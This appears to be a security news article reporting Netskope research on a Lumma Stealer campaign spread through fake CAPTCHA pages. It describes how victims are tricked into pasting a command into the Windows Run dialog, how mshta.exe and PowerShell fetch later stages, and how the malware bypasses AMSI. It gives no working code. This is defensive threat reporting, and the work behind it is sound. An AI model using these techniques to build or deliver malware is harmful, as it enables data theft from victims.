Beware of Fake Captcha Verification Checks That Deliver Lumma Malware

Netskope Threat Labs has uncovered a new global malware campaign deploying the Lumma Stealer through fake CAPTCHA pages.

Lumma Stealer, a malware-as-a-service (MaaS) threat observed since 2022, is being used to target victims across multiple industries, including telecommunications, healthcare, banking, and marketing.

Regions affected by the attack include Argentina, Colombia, the United States, the Philippines, and other countries worldwide.

Fake CAPTCHAs

The infection chain begins when an unsuspecting victim is redirected to a fake CAPTCHA page upon visiting a compromised website.

fake CAPTCHA pages
Infection Chain

Since August 2024, Lumma Stealer campaigns have employed a specific type of fake CAPTCHA that instructs users to run commands directly on their Windows systems.

This technique cleverly bypasses browser-based cybersecurity controls, as the malicious commands are executed outside the browser’s context.

The fake CAPTCHA prompts the user to press “Windows + R” to open the Run dialog, paste clipboard content delivered by the CAPTCHA’s embedded JavaScript and press “Enter.”

fake CAPTCHA pages
Fake CAPTCHA instruction

Behind the scenes, the JavaScript code injects a command that uses the legitimate Windows tool mshta.exe.

This tool downloads and executes an HTA file from a remote server, a technique categorized as a “Living Off the Land Binary” (LOLBIN) attack.

By exploiting trusted binaries such as mshta.exe, attackers effectively circumvent traditional endpoint defenses and security solutions.

Multi-Stage Payload Execution

The payloads observed in this campaign exhibit diverse extensions, including .mp3, .accdb, and .pub, but these files are all disguised malware.

Upon execution, these payloads run malicious JavaScript code that calls a PowerShell command to decode a Base64-encoded data chunk and execute the next stage of the infection chain.

The PowerShell commands trigger the download of larger, obfuscated scripts from external servers.

These scripts perform advanced evasion techniques, such as bypassing the Windows Antimalware Scan Interface (AMSI).

This bypass is achieved by modifying the memory of the clr.dll module to prevent AMSI from being invoked during the execution of the payload.

Netskope researchers noted that the attackers used open-source AMSI bypass snippets, further complicating detection efforts.

Subsequently, a Base64-encoded payload is decoded into a Portable Executable (PE) file, which is loaded and executed using reflection.

The final payload in this chain is the Lumma Stealer malware, which is designed to harvest sensitive data from infected systems.

Notably, the attackers employed tools like Babel for payload obfuscation, making reverse engineering and analysis increasingly challenging for cybersecurity experts.

The Lumma Stealer MaaS platform has demonstrated consistent evolution in its delivery methods, payloads, and evasion techniques.

Its reliance on abusing user interaction, trusted Windows binaries, and advanced obfuscation poses significant challenges to traditional security solutions.

This latest campaign highlights the importance of educating users about social engineering tactics, bolstering endpoint detection and response (EDR) mechanisms, and continuously monitoring emerging threats.

Also Read:

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here